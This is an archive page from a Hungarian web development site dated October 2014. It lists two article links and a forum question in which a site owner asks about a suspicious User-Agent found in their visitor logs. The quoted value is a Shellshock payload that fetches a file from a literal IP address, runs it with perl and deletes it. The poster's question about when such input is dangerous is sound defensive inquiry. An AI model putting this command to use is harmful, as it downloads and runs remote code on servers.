ugrás a tartalomhoz

Archívum - Okt 3, 2014

Why GitHub is not your CV

Hidvégi Gábor · 2014. Okt. 3. (P), 14.48
Kevés és nem strukturált információt szolgáltat a GitHub a munka szempontjából
 

Creating Scrolling Parallax Effects with CSS

Hidvégi Gábor · 2014. Okt. 3. (P), 14.25
A népszerű effektus megvalósítása szkript nélkül
 

USER_AGENT exploit?

tacsiazuma · 2014. Okt. 3. (P), 00.14
A weboldalamon a látogatói statisztikákat egy adatbázisban tárolom, ahol puszta kíváncsiságból bedobtam egy useragent oszlopot is, ami értelemszerűen a $_SERVER['USER_AGENT'] változó értékét kapja meg (szerencsére az admin panel sehol nem iratja ki ezt). Ahogy nézegettem az adatokat, ezt találtam köztük:
() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/
Annyira rájöttem, hogy a kis hamis letöltene valami fájlt az adott IP-ről, aztán azt lefuttatná perl-el és eltakarítaná a nyomait.

Az egyértelmű, hogy nem jó szándékkal tenné, viszont az érdekelne, hogy mely esetekben fordulhat elő, hogy shell scriptben futtassak le USER_AGENT-et? Mikor jelent ez veszélyt?